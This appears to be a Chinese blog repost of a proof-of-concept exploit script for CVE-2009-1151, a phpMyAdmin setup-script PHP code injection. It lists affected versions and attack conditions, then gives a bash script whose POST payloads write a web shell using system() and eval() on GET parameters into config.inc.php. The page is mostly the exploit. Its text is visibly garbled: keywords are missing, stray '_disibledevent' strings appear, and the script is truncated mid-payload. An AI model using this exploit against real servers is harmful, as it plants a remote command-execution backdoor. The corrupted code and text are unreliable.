phpmyadminphp5.0:phpMyAdmin (/scripts/setup.php) PHP 注入代码

on 2009-9-2 in Linux | 0 Comment
  此漏洞代码在以下环境测试通过:
  phpMyAdmin 2.11.4, 2.11.9.3, 2.11.9.4, 3.0.0 及 3.0.1.1版本;
  Linux内核版本 2.6.24-24-generic i686 GNU/Linux (Ubuntu 8.04.2);
  攻击环境要求:
  phpMyAdmin版本:早于2.11.9.52.11.x和早于3.1.3.13.x;
  此漏洞只针对采用向导模式安装phpMyAdmin有效而对采用手动安装无效;
  管理员必须未删除"/phpMyAdmin/"目录下"/config/"子目录"/scripts/up.php"尝试创建下面PHP代码注入"config.inc.php"文件正是在这个子目录下
  
  代码
  #!/bin/bash
  
  # CVE-2009-1151: phpMyAdmin '/scripts/up.php' PHP Code Injection RCE PoC v0.11
  # by pagvac (gnucitizen.org), 4th June 2009.
  # special thanks to Greg Ose (labs.neohapsis.com) for discovering such a cool vuln,
  # and to str0ke (milw0rm.com) for testing this PoC script and providing feedback!
  
  # PoC script successfully tested _disibledevent=>http://snipurl.com/jhjxx
  # 3) administrator must have NOT deleted the '/config/' directory
  # within the '/phpMyAdmin/' directory. this is because this directory is
  # where '/scripts/up.php' tries to create 'config.inc.php' which is where
  # our evil PHP code is injected 8)
  
  # more info _disibledevent=>http://www.phpmyadmin.net/home_page/security/PMASA-2009-3.php
  # http://labs.neohapsis.com/2009/04/06/about-cve-2009-1151/
  
   [[ $# -ne 1 ]]
  then
  echo "usage: ./$(basename $0) <phpMyAdmin_base_URL>"
  echo "i.e.: ./$(basename $0) http://target.tld/phpMyAdmin/"
  exit
  fi
  
   ! which curl >/dev/null
  then
  echo "sorry but you need curl for this script to work!"
  echo "on Debian/Ubuntu: sudo apt-get curl"
  exit
  fi
  
  
  function exploit {
  
  postdata="token=$1&action=save&configuration="\
  "a:1:{s:7:%22Servers%22%3ba:1:{i:0%3ba:6:{s:23:%22host%27]="\
  "%27%27%3b%20phpinfo%28%29%3b//%22%3bs:9:%22localhost%22%3bs:9:"\
  "%22extension%22%3bs:6:%22mysqli%22%3bs:12:%22connect_type%22%3bs:3:"\
  "%22tcp%22%3bs:8:%22compress%22%3bb:0%3bs:9:%22auth_type%22%3bs:6:"\
  "%22config%22%3bs:4:%22user%22%3bs:4:%22root%22%3b}}}&eoltype=unix"
  
  postdata2="token=$1&action=save&configuration=a:1:"\
  "{s:7:%22Servers%22%3ba:1:{i:0%3ba:6:{s:136:%22host%27%5d="\
  "%27%27%3b%20(\$_GET%5b%27c%27%5d){echo%20%27%3cpre%3e%27%3b"\
  "system(\$_GET%5b%27c%27%5d)%3becho%20%27%3c/pre%3e%27%3b}"\
  "(\$_GET%5b%27p%27%5d){echo%20%27%3cpre%3e%27%3beval"\
  "(\$_GET%5b%27p%27%5d)%3becho%20%27%3c/pre%3e%27%3b}%3b//"\
  "%22%3bs:9:%22localhost%22%3bs:9:%22extens
Tags:  asp防注入代码 php4phpmyadmin phpmyadminphp5.2 phpmyadminphp5.0

延伸阅读

最新评论

发表评论